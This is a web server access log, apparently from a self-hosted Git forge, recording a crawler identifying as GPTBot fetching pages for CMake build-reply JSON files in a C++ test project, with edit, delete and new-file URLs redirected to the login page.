+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:52:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 47020] [Gzip 22.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13826] [Gzip 8.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:52:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:52:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9874] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 999] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12729] [Gzip 6.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:52:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:52:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:52:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:52:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:52:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 1009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11045] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11577] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9884] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11367] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35997] [Gzip 10.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:52:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11376] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 33010] [Gzip 23.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9896] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" 